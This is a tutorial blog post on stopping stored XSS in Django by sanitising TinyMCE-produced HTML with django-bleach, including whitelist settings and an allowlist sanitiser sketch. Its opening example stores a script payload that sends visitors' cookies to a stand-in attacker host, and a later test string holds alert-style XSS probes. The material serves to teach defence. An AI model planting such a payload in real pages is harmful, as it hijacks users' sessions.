Storing valid, sanitised HTML in the database to mitigate malicious code injection
In a typical stored cross-site scripting (XSS) attack, the hacker submits an HTML form that includes malicious code. When another user visits a page on which this data is rendered, the malicious code is executed in that user's browser.
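To make the attack concrete, here is a deliberately unsafe sketch of a page that pastes stored user input straight into its HTML. The comment payload and the `render_page_unsafely` helper are hypothetical, chosen only to illustrate the problem.

```python
# Hypothetical comment submitted by an attacker and saved as-is in the database.
stored_comment = (
    '<p>Nice post!</p>'
    '<script>document.location="https://evil.example/?c=" + document.cookie</script>'
)


def render_page_unsafely(comment: str) -> str:
    """UNSAFE: builds the page by inserting stored data verbatim into the HTML."""
    return f"<html><body><div class='comment'>{comment}</div></body></html>"


page = render_page_unsafely(stored_comment)
# The <script> element reaches the browser intact, so it runs for every visitor.
print("<script>" in page)  # True
```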
There are at least a couple of ways to mitigate this risk:
- When the hacker submits the HTML form, any malicious code is removed before the data is stored in the database
- When data is retrieved from the database, any malicious code is removed before it is rendered on the web page
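For comparison, the second approach usually means escaping data as it is rendered (Django's template engine escapes variables this way by default). A minimal sketch with Python's `html.escape`, using a hypothetical `render_escaped` helper, shows the trade-off for rich text: the script is neutralised, but so is the legitimate `<p>` and `<strong>` markup, which readers would see as literal tags.

```python
import html

# Hypothetical rich-text value, as an HTML editor might submit it.
submitted = '<p>Hello <strong>world</strong></p><script>alert("xss")</script>'


def render_escaped(value: str) -> str:
    """Second strategy: escape everything at render time."""
    return f"<div class='entry'>{html.escape(value)}</div>"


rendered = render_escaped(submitted)
# Both the <script> and the harmless formatting tags are now shown as plain text.
print(rendered)
```

This is one reason an allowlist that keeps safe formatting tags suits content produced by a rich-text editor.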
In this blog post we’ll briefly discuss the first approach, using the Django package django-bleach (https://django-bleach.readthedocs.io/).
In one of my Django apps, I’m using TinyMCE to let users enter HTML in a form. Since the tags and attributes TinyMCE produces by default are safe (i.e. not exploitable by hackers), I wanted to allow only these to be stored in my database.
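The tags, attributes and inline CSS properties an editor emits can also be enumerated with a short script rather than by eye. Here is a minimal sketch using only Python's `html.parser`; the `TagCollector` class is hypothetical and the sample HTML is made up, not captured from TinyMCE, so you would feed it real editor output to get a usable list.

```python
from html.parser import HTMLParser


class TagCollector(HTMLParser):
    """Record every tag name, attribute name and inline CSS property seen."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: set[str] = set()
        self.attributes: set[str] = set()
        self.styles: set[str] = set()

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lower-cases tag and attribute names.
        self.tags.add(tag)
        for name, value in attrs:
            self.attributes.add(name)
            if name == "style" and value:
                # "text-align: center; color: red" -> {"text-align", "color"}
                for declaration in value.split(";"):
                    prop, sep, _ = declaration.partition(":")
                    if sep and prop.strip():
                        self.styles.add(prop.strip().lower())


# Hypothetical sample of editor output (e.g. copied from DevTools).
sample = (
    '<h2>Title</h2>'
    '<p style="text-align: center;">Some <strong>bold</strong> and '
    '<a href="https://example.com" title="Example">a link</a>.</p>'
    '<ul><li><span style="text-decoration: underline;">item</span></li></ul>'
)

collector = TagCollector()
collector.feed(sample)
collector.close()
print(sorted(collector.tags))        # ['a', 'h2', 'li', 'p', 'span', 'strong', 'ul']
print(sorted(collector.attributes))  # ['href', 'style', 'title']
print(sorted(collector.styles))      # ['text-align', 'text-decoration']
```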
After installing django-bleach, I updated my model to use its BleachField for storing safe HTML data:
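from django.db import models
from django_bleach.models import BleachField

class Entry(models.Model):
    # HTML is cleaned against the django-bleach whitelist before being saved
    my_html_data = BleachField()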
This is enough to ensure that the HTML stored in the my_html_data database column contains only whitelisted HTML tags.
Next, to build the list of allowed tags, I used Chrome DevTools to inspect the HTML generated by TinyMCE and added those tags to my django-bleach whitelist. For reference, these are the settings I ended up with:
# settings.py
BLEACH_ALLOWED_TAGS = ['p', 'b', 'i', 'u', 'em', 'strong', 'a', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'pre', 'span', 'ul', 'ol', 'li']
BLEACH_ALLOWED_ATTRIBUTES = ['href', 'title', 'style']
BLEACH_ALLOWED_STYLES = [
    'font-family', 'font-weight', 'text-decoration', 'font-variant', 'text-align', 'background-color',
]
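To make concrete what these three whitelists do to a submitted value, here is a rough, standard-library-only sketch. It is not how django-bleach or bleach work internally, and every name in it (`sanitise`, `AllowlistSanitiser`, `clean_style`, `is_safe_href`, `ALLOWED_SCHEMES`) is hypothetical. It also makes simplifying assumptions: disallowed tags are stripped rather than escaped (bleach escapes them by default), `href` values are limited to an assumed set of URL schemes, and unclosed tags are not balanced. For a real app, the library is the better choice.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Copied from the settings above (illustrative values).
ALLOWED_TAGS = {'p', 'b', 'i', 'u', 'em', 'strong', 'a', 'h1', 'h2', 'h3',
                'h4', 'h5', 'h6', 'pre', 'span', 'ul', 'ol', 'li'}
ALLOWED_ATTRIBUTES = {'href', 'title', 'style'}
ALLOWED_STYLES = {'font-family', 'font-weight', 'text-decoration',
                  'font-variant', 'text-align', 'background-color'}
# Assumption: only these URL schemes are acceptable in href values.
ALLOWED_SCHEMES = {'http', 'https', 'mailto'}


def clean_style(value: str) -> str:
    """Keep only whitelisted CSS properties, dropping suspicious values."""
    kept = []
    for declaration in value.split(';'):
        prop, sep, val = declaration.partition(':')
        prop, val = prop.strip().lower(), val.strip()
        if not sep or prop not in ALLOWED_STYLES:
            continue
        # Crude guard against url()/expression() payloads and CSS escapes.
        lowered = val.lower()
        if 'url(' in lowered or 'expression(' in lowered or '\\' in val:
            continue
        kept.append(f'{prop}: {val}')
    return '; '.join(kept)


def is_safe_href(value: str) -> bool:
    """Accept only absolute URLs whose scheme is whitelisted."""
    # Drop whitespace/control characters browsers may ignore, e.g. "java\tscript:".
    compact = ''.join(ch for ch in value if ch.isprintable() and not ch.isspace())
    try:
        return urlsplit(compact).scheme in ALLOWED_SCHEMES
    except ValueError:  # e.g. a malformed IPv6 host
        return False


class AllowlistSanitiser(HTMLParser):
    """Re-emit only whitelisted tags and attributes; escape all text."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.parts: list[str] = []
        self.skip_depth = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ('script', 'style'):
            self.skip_depth += 1
            return
        if tag not in ALLOWED_TAGS:
            return  # drop the tag itself; its text is still kept
        rendered = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRIBUTES or value is None:
                continue
            if name == 'href' and not is_safe_href(value):
                continue
            if name == 'style':
                value = clean_style(value)
                if not value:
                    continue
            rendered.append(f' {name}="{html.escape(value)}"')
        self.parts.append(f'<{tag}{"".join(rendered)}>')

    def handle_endtag(self, tag):
        if tag in ('script', 'style'):
            self.skip_depth = max(0, self.skip_depth - 1)
        elif tag in ALLOWED_TAGS:
            self.parts.append(f'</{tag}>')

    def handle_data(self, data):
        if not self.skip_depth:
            self.parts.append(html.escape(data, quote=False))


def sanitise(fragment: str) -> str:
    parser = AllowlistSanitiser()
    parser.feed(fragment)
    parser.close()  # flush any text still buffered by the parser
    return ''.join(parser.parts)


dirty = ('<p style="text-align: center; position: fixed">Hi '
         '<a href="javascript:alert(1)" onclick="steal()">click</a>'
         '<script>alert("xss")</script><img src=x onerror=alert(1)></p>')
print(sanitise(dirty))  # <p style="text-align: center">Hi <a>click</a></p>
```

The `position` declaration, the `javascript:` link, the `onclick` handler, the script and the `<img>` with its `onerror` handler are all removed, while the whitelisted formatting survives.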